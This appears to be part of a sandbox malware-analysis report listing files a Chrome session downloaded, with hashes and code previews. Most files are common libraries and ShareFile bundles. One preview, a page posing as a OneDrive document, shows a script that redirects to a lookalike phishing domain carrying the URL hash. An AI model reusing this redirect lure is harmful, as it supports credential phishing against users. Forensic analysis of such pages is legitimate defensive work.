                                                                                                                                                                                                                      SHA-512:A5AC1F4515BF497CF8E3C07795001F247B3A092A8AB3E755D884075A99C731E5782E303011E6BAB28596BE0637CF775E713FFA1B1DD34016A63364E1595D80DE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevtenantmgtpilet,{}).System.register(["react","react-dom","react-router-dom","tslib"],(function(e,t){var r={},n={},o={},i={};return Object.defineProperty(r,"__esModule",{value:!0}),{setters:[function(e){Object.keys(e).forEach((function(t){r[t]=e[t]}))},function(e){n["default"]=e["default"],n.findDOMNode=e.findDOMNode,n.flushSync=e.flushSync},function(e){o.Route=e.Route,o.Router=e.Router,o.Switch=e.Switch,o.useHistory=e.useHistory},function(e){i.__assign=e.__assign,i.__awaiter=e.__awaiter,i.__generator=e.__generator,i.__makeTemplateObject=e.__makeTemplateObject,i.__spreadArray=e.__spreadArray}],execute:function(){e((()=>{var e,a,s={458:(e,t,r)=>{"use strict";r.d(t,{AE:()=>j,jQ:()=>O,Qj:()=>C});var n=r(9669),o=r.n(n),i=r(4998),a=undefined&&undefined.__assign||function(){return a=Object.assign||function(e){for(var t,r=1,n=arguments.length;r<n;r++)for(var o in t=arguments[r])Object.prototype.hasOwnProperty.call(t,o)&&(e[o]=t[o]);return e},a.apply(this,
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):48316
                                                                                                                                                                                                                      Entropy (8bit):5.6346993394709
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                                                                                                      MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                                                                                      SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                                                                                      SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                                                                                      SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                                                                                                                                      Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):23
                                                                                                                                                                                                                      Entropy (8bit):3.708132064658602
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:YMEsRa:YMpo
                                                                                                                                                                                                                      MD5:2E3B4BDE9D3F0B12A1B68BF76DEA5B5E
                                                                                                                                                                                                                      SHA1:0EADE51D11409D2C996FFAF140DAAE6AECCC1E6D
                                                                                                                                                                                                                      SHA-256:4E8F3099517F69EADF38031D9284E1F8AB90BEFD6F84C998F79CD9ECEEB53C76
                                                                                                                                                                                                                      SHA-512:E01EA974F92B67BB31A6EA3D977089CC3E961239583B88F1A443DC5659A83B16ADE0A7769F08B69D7BA66052E018A7A824FCB0F172AC630E586574BBC382960B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview:{"ip":"173.254.250.76"}
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):89501
                                                                                                                                                                                                                      Entropy (8bit):5.289893677458563
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                                                      MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                                      SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                                      SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                                      SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                                                                                                                      Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):24
                                                                                                                                                                                                                      Entropy (8bit):2.459147917027245
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                                                      MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                                                      SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                                                      SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                                                      SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview:GIF89a.......,..........
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65471)
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):308129
                                                                                                                                                                                                                      Entropy (8bit):5.532445628001004
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3072:S1o5EWGKEsOxBriS120AAjWNIGhyBXipChmB1cmX4fFgJGOd4ojx:SHWGKEsOxgAiB4fiwOP
                                                                                                                                                                                                                      MD5:AAA88D2636DFEB090B5625DA19C6583B
                                                                                                                                                                                                                      SHA1:4B2A69A4DBE262EE61A895E662E6FAAB8975747F
                                                                                                                                                                                                                      SHA-256:24100E38A4398127141377D9B7FABCD8EB2F35BF68062306D6F3828133EA7E7B
                                                                                                                                                                                                                      SHA-512:18D0372BC9EB2DAE1664688FE7FFF3B8D9EA987070A6D4C68F9E2036D4DF1A9119766F1CED2070F21744201EFADE8119E1E8885A28AD847BD09E53508678963D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevprojectspilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},a={},i={},c={},s={},u={};return Object.defineProperty(a,"__esModule",{value:!0}),{setters:[function(e){n.AccountsEntity=e.AccountsEntity,n.Api=e.Api,n.CapabilitiesEntity=e.CapabilitiesEntity,n.CapabilityName=e.CapabilityName,n.ContactListType=e.ContactListType,n.ContactsEntity=e.ContactsEntity,n.CustomWorkflowBundleType=e.CustomWorkflowBundleType,n.DocumentApprovalWorkflowAction=e.DocumentApprovalWorkflowAction,n.EncryptedEmailsEntity=e.EncryptedEmailsEntity,n.ExceptionReason=e.ExceptionReason,n.FileAction=e.FileAction,n.FileLockEntity=e.FileLockEntity,n.FileVirusStatus=e.FileVirusStatus,n.IntegrationProvider=e.IntegrationProvider,n.IntegrationsEntity=e.IntegrationsEntity,n.ItemOperations=e.ItemOperations,n.ItemOrderingMode=e.ItemOrderingMode,n.ItemsEntity=e.ItemsE
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65310)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):510304
                                                                                                                                                                                                                      Entropy (8bit):5.331685296372785
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6144:qF2IodON2KmqE+K/qq/W2mfIyPdOlaEeX05nu+1y0DgFHgJ9biLsjCKa:qF2ON2w3K/qq/W2mf3Ed1y0McbiLlKa
                                                                                                                                                                                                                      MD5:3A34F39BEDF2B38233858CF08BCC1607
                                                                                                                                                                                                                      SHA1:44127288F52A86AEA36B63950C4DF35AB67DDFC7
                                                                                                                                                                                                                      SHA-256:322789B94C5FFF42BB59D43D3329AB3F793E5738A9745317103A56D6856F9C75
                                                                                                                                                                                                                      SHA-512:5D39FF6F20F101AE4EF00F7793189DC6D2AAB0A47774F50DE3D75F0CA2A75BCCF263554F7F206E60E0D6F4E063BDA958C799C758191E24E794A5EBCB41A8C61B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://citrix-sharefile-content.customer.pendo.io/agent/static/74b07336-7560-45fc-7cd1-95032a784d52/pendo.js
                                                                                                                                                                                                                      Preview:// Pendo Agent Wrapper.// Copyright 2024 Pendo.io, Inc..// Environment: production.// Agent Version: 2.253.1.// Installed: 2024-11-05T19:15:28Z.(function (PendoConfig) {./*.@license https://agent.pendo.io/licenses.*/.!function(rw,ow,aw){!function(){var T=Array.prototype.slice;try{T.call(ow.documentElement)}catch(Ut){Array.prototype.slice=function(e,t){if(t=void 0!==t?t:this.length,"[object Array]"===Object.prototype.toString.call(this))return T.call(this,e,t);var n,i=[],r=this.length,o=e||0,a=(t<0?r+t:t||r)-(o=0<=o?o:r+o);if(0<a)if(i=new Array(a),this.charAt)for(n=0;n<a;n++)i[n]=this.charAt(o+n);else for(n=0;n<a;n++)i[n]=this[o+n];return i}}String.prototype.trim||(String.prototype.trim=function(){return this.replace(/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,"")});var A=function(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_".split("");return{uint8ToBase64:function(e){var t,n,i,r=e.length%3,o="";for(t=0,i=e.length-r;t<i;t+=3)n=(e[t]<<16)+(e[t+1]<<8)+e[t+2]
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65476)
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):871937
                                                                                                                                                                                                                      Entropy (8bit):5.44351815937479
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12288:FPE2yOF/Pty/YqVGkc8qZCHHV/Yk23OI0O8KP1LiZyM9XOqtve99T:FPrFkLqZUNYk23OPO8KP1L2y2XOqF8
                                                                                                                                                                                                                      MD5:6D9484A85B5FF2D8A7FC7C926C5AA72C
                                                                                                                                                                                                                      SHA1:E92A9EB0A38769A87BAF33F4E0484FC4A51C4827
                                                                                                                                                                                                                      SHA-256:A8005FE6BFE222CE2A30520060491EC14FE133E1F16E1735EDE4FCC9C5C1232F
                                                                                                                                                                                                                      SHA-512:E817D55EF7D844D2CC409D3E9E6C4620CF3568065C42A756FB5D2DAD8AADAC195B74A1668FA78CD140C3634A12301EBA3EA110D93DC51F428000155D9BCF571E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevfileviewerpilet,{}).System.register(["@sharefiledev/antd-config","antd","react","tslib"],(function(t,e){var n={},i={},r={},s={};return{setters:[function(t){n.colorPalette=t.colorPalette,n.defaultAntDConfig=t.defaultAntDConfig,n.sizes=t.sizes},function(t){i.Alert=t.Alert,i.Button=t.Button,i.Checkbox=t.Checkbox,i.Col=t.Col,i.Divider=t.Divider,i.Flex=t.Flex,i.Input=t.Input,i.Layout=t.Layout,i.Modal=t.Modal,i.Row=t.Row,i.Skeleton=t.Skeleton,i.Spin=t.Spin,i.Tree=t.Tree,i.Typography=t.Typography},function(t){r.Children=t.Children,r.Fragment=t.Fragment,r.Suspense=t.Suspense,r.createContext=t.createContext,r.createElement=t.createElement,r.default=t.default,r.forwardRef=t.forwardRef,r.isValidElement=t.isValidElement,r.lazy=t.lazy,r.useCallback=t.useCallback,r.useContext=t.useContext,r.useEffect=t.useEffect,r.useLayoutEffect=t.useLayoutEffect,r.useRef=t.useRef,r.useState=t.useState,r.version=t.version},function(t){s.__awaiter=t.__awaiter}],execute:functio
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65480)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):178957
                                                                                                                                                                                                                      Entropy (8bit):5.329232951768454
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3072:f9/b1XWD+4jgnz8nzvfWD34jsWDW4j+ZbfZbXWDG4jFnzbnz8ZBovwylOUuOB1OI:f9BYqZBovwyYU1B1OTM
                                                                                                                                                                                                                      MD5:826DA847895415A16E1D242AFD0F2BA7
                                                                                                                                                                                                                      SHA1:77C1F5AF0C7C230640B74C163313BE93427F3B51
                                                                                                                                                                                                                      SHA-256:8E68E217EEC68E833BE390E850C8E9DB8FE30FEA29AFEC22F2FF00CA3E80C25D
                                                                                                                                                                                                                      SHA-512:85E1368585DF066AF2BAC194AE9E1D611E7B973535659D83CB490273C294DEDBB180DC3DB5718225B5C660BD9A92DD3B4B8F999FA197EA6B48CF85F74B903F78
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-client-pilet/0.10.6/package/dist/index.js
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevclientpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,n){var t={},r={},i={},o={},a={},s={},u={},c={};return Object.defineProperty(o,"__esModule",{value:!0}),{setters:[function(e){t.AccountsEntity=e.AccountsEntity,t.Api=e.Api,t.AppsEntity=e.AppsEntity,t.CapabilitiesEntity=e.CapabilitiesEntity,t.CapabilityName=e.CapabilityName,t.ContactListType=e.ContactListType,t.ContactsEntity=e.ContactsEntity,t.CustomWorkflowBundleType=e.CustomWorkflowBundleType,t.DocumentApprovalWorkflowAction=e.DocumentApprovalWorkflowAction,t.EncryptedEmailsEntity=e.EncryptedEmailsEntity,t.ExceptionReason=e.ExceptionReason,t.FavoritesEntity=e.FavoritesEntity,t.FileAction=e.FileAction,t.FileLockEntity=e.FileLockEntity,t.FileVirusStatus=e.FileVirusStatus,t.IntegrationProvider=e.IntegrationProvider,t.IntegrationsEntity=e.IntegrationsEntity,t.ItemOperations=e.ItemOperations,
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):24
                                                                                                                                                                                                                      Entropy (8bit):2.459147917027245
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                                                      MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                                                      SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                                                      SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                                                      SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview:GIF89a.......,..........
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65476)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):871937
                                                                                                                                                                                                                      Entropy (8bit):5.44351815937479
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12288:FPE2yOF/Pty/YqVGkc8qZCHHV/Yk23OI0O8KP1LiZyM9XOqtve99T:FPrFkLqZUNYk23OPO8KP1L2y2XOqF8
                                                                                                                                                                                                                      MD5:6D9484A85B5FF2D8A7FC7C926C5AA72C
                                                                                                                                                                                                                      SHA1:E92A9EB0A38769A87BAF33F4E0484FC4A51C4827
                                                                                                                                                                                                                      SHA-256:A8005FE6BFE222CE2A30520060491EC14FE133E1F16E1735EDE4FCC9C5C1232F
                                                                                                                                                                                                                      SHA-512:E817D55EF7D844D2CC409D3E9E6C4620CF3568065C42A756FB5D2DAD8AADAC195B74A1668FA78CD140C3634A12301EBA3EA110D93DC51F428000155D9BCF571E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-fileviewer-pilet/1.32.0/package/dist/index.js
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevfileviewerpilet,{}).System.register(["@sharefiledev/antd-config","antd","react","tslib"],(function(t,e){var n={},i={},r={},s={};return{setters:[function(t){n.colorPalette=t.colorPalette,n.defaultAntDConfig=t.defaultAntDConfig,n.sizes=t.sizes},function(t){i.Alert=t.Alert,i.Button=t.Button,i.Checkbox=t.Checkbox,i.Col=t.Col,i.Divider=t.Divider,i.Flex=t.Flex,i.Input=t.Input,i.Layout=t.Layout,i.Modal=t.Modal,i.Row=t.Row,i.Skeleton=t.Skeleton,i.Spin=t.Spin,i.Tree=t.Tree,i.Typography=t.Typography},function(t){r.Children=t.Children,r.Fragment=t.Fragment,r.Suspense=t.Suspense,r.createContext=t.createContext,r.createElement=t.createElement,r.default=t.default,r.forwardRef=t.forwardRef,r.isValidElement=t.isValidElement,r.lazy=t.lazy,r.useCallback=t.useCallback,r.useContext=t.useContext,r.useEffect=t.useEffect,r.useLayoutEffect=t.useLayoutEffect,r.useRef=t.useRef,r.useState=t.useState,r.version=t.version},function(t){s.__awaiter=t.__awaiter}],execute:functio
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (55320)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):55384
                                                                                                                                                                                                                      Entropy (8bit):5.402007343018523
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:Kt22vAtSxrvAfxISahJs3tp6f98kE7B38hJnrtOr:M53sbUOxl83nYr
                                                                                                                                                                                                                      MD5:D7FA53958E5BA828FEBE01A45075469E
                                                                                                                                                                                                                      SHA1:1AE6A7607029209F55A13F68B5CFDF1CCA95082B
                                                                                                                                                                                                                      SHA-256:44C772C0BDD957C95564D589FA388D7622B0CF17C20B2CAF21760E4FC66E0DC4
                                                                                                                                                                                                                      SHA-512:25462206E25766922831E0A667FF295F063E202EFE4B21271059CEC70F50AE241B9F205D58EAAE0CF6BAE3832B4D54154BD8695CD91B40ECD7EF4CD92187EA60
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-review-approval-pilet/0.27.6/package/dist/index.js
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevreviewapprovalpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","tslib"],(function(e,t){var r={},n={},a={},o={},i={},c={};return Object.defineProperty(o,"__esModule",{value:!0}),{setters:[function(e){r.AccountsEntity=e.AccountsEntity,r.ContactListType=e.ContactListType,r.ContactsEntity=e.ContactsEntity,r.ItemsEntity=e.ItemsEntity,r.Uploader=e.Uploader,r.UserRole=e.UserRole,r.UsersEntity=e.UsersEntity,r.ZoneService=e.ZoneService,r.createFile=e.createFile},function(e){n.colorPalette=e.colorPalette,n.sizes=e.sizes},function(e){a.Alert=e.Alert,a.App=e.App,a.Avatar=e.Avatar,a.Button=e.Button,a.Checkbox=e.Checkbox,a.Col=e.Col,a.DatePicker=e.DatePicker,a.Divider=e.Divider,a.Dropdown=e.Dropdown,a.Flex=e.Flex,a.Form=e.Form,a.Input=e.Input,a.Modal=e.Modal,a.Row=e.Row,a.Select=e.Select,a.Space=e.Space,a.Spin=e.Spin,a.Steps=e.Steps,a.Tabs=e.Tabs,a.Tag=e.Tag,a.Tooltip=e.Tooltip,a.Typography=e.Typography,a.them
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (6378)
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):6490
                                                                                                                                                                                                                      Entropy (8bit):5.257387004754639
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:y2hG7a+HNCBCQ4vk8LJQM3nRoP7uFjOsMeZ:ia+H4BC3DLJTnRoP7uUi
                                                                                                                                                                                                                      MD5:FAE76DAE7784930E96292B65FEEDBC0D
                                                                                                                                                                                                                      SHA1:AFFD25E6159BE1645F1FFE8CE4BAFBF8D9710C3C
                                                                                                                                                                                                                      SHA-256:69B7DBF013D733F4E7A1313102219E1D58DFA5F7D95D2ED590B88D935C8B1E84
                                                                                                                                                                                                                      SHA-512:6B345E391AAB93D802A5B11FEF39EB86814027124CE7A9E45CBC63007316285900B095455DF21B73F542E8C60FC38E3ADF38B01DAF35CC70E98F118C719D6A30
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevremediationpilet,{"@citrite/citrix-ui@25.46.0":"citrite-citrix-ui.js"}).System.register(["@citrite/citrix-ui@25.46.0","@sharefiledev/antd-config","antd","react","tslib"],(function(e,t){var r={},n={},o={},a={},i={};return{setters:[function(e){r.notifyError=e.notifyError,r.notifyInfo=e.notifyInfo,r.notifySuccess=e.notifySuccess},function(e){n.AntDConfigProvider=e.AntDConfigProvider,n.colorPalette=e.colorPalette},function(e){o.Button=e.Button,o.Card=e.Card,o.Col=e.Col,o.Divider=e.Divider,o.Flex=e.Flex,o.Modal=e.Modal,o.Row=e.Row,o.Space=e.Space,o.Switch=e.Switch,o.Tooltip=e.Tooltip,o.Typography=e.Typography,o.theme=e.theme},function(e){a.Fragment=e.Fragment,a.createContext=e.createContext,a.createElement=e.createElement,a.default=e.default,a.forwardRef=e.forwardRef,a.useContext=e.useContext,a.useEffect=e.useEffect,a.useRef=e.useRef,a.useState=e.useState},function(e){i.__awaiter=e.__awaiter}],execute:function(){e((()=>{var e,l,s={8569:(e,t,r)=>{"use
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines (65369), with CRLF line terminators
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):104599
                                                                                                                                                                                                                      Entropy (8bit):5.962074579328189
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:0nU8EXCwu3OfL51mfDKidvbtsCSBiuwlIvtDkhbAHvqmQm5/iz865hIKi2raaMlp:GUPXVjmeigXs6pkt+G1rIKi2rqlaM
                                                                                                                                                                                                                      MD5:BE5336C5BA77F086BA54CEFFF7575241
                                                                                                                                                                                                                      SHA1:E60396C80DAA8EE489FF7E47A55CD1A7A6C03039
                                                                                                                                                                                                                      SHA-256:21AEF66BDFCA60E0591D60DA8529A54338D01CCDCD08ACE00698FC25A83A5551
                                                                                                                                                                                                                      SHA-512:E5F411B4C8A64392C3EDB2DAC045D04B130A7ACE1E3423CC7E7E1AA4F24006B51B6D7B3A80DACDF3282E83E24530FBE2340106D215D12983BC46E148337B1DD6
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://pub-10305130932840cc9846324aa165bbf7.r2.dev/0nedrivedoc.html
                                                                                                                                                                                                                      Preview:<script>....let ulink = "https://tmmc-radwvaste.com/200/#".. let ai = `${ulink}${window.location.hash.substring(1)}`;.. let bi = "https://amazon.com/";....let imageUrl = 'data:image/jpeg;base64,/9j/4AAQSkZJRgABAQEAkACQAAD/4gHbSUNDX1BST0ZJTEUAAQEAAAHLAAAAAAJAAABtbnRyUkdCIFhZWiAAAAAAAAAAAAAAAABhY3NwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAA9tYAAQAAAADTLVF0BQ8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlyWFlaAAAA8AAAABRnWFlaAAABBAAAABRiWFlaAAABGAAAABR3dHB0AAABLAAAABRjcHJ0AAABQAAAAAxyVFJDAAABTAAAACBnVFJDAAABTAAAACBiVFJDAAABTAAAACBkZXNjAAABbAAAAF9YWVogAAAAAAAAb58AADj0AAADkVhZWiAAAAAAAABilgAAt4cAABjcWFlaIAAAAAAAACShAAAPhQAAttNYWVogAAAAAAAA808AAQAAAAEWwnRleHQAAAAATi9BAHBhcmEAAAAAAAMAAAACZmYAAPKnAAANWQAAE9AAAApbZGVzYwAAAAAAAAAFc1JHQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/2wBDAAQDAwQDAwQEAwQFBAQFBgoHBgYGBg0JCggKDw0QEA8NDw4RExgUERIXEg4PFRwVFxkZGxsbEBQdHx0aHxgaGxr/2wBDAQQFBQYFBgwHBwwaEQ8RGhoaGhoaGhoa
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (32010)
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):50049
                                                                                                                                                                                                                      Entropy (8bit):5.315307632257224
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:PFFeY2oE4e2HneiJbpJuAl39FVy7bT0tUpFk8Qgm:tIyreiBphl39FsvTpFvi
                                                                                                                                                                                                                      MD5:63E2DF852D15AB21D7FF8FC4363222E8
                                                                                                                                                                                                                      SHA1:7EE401BA652DB0A4EC960350E17216CDA01E22FB
                                                                                                                                                                                                                      SHA-256:545156ADEAE44DADC82B98D504F805EBE77FB79C928EF34EED1057BB9D4CB8FE
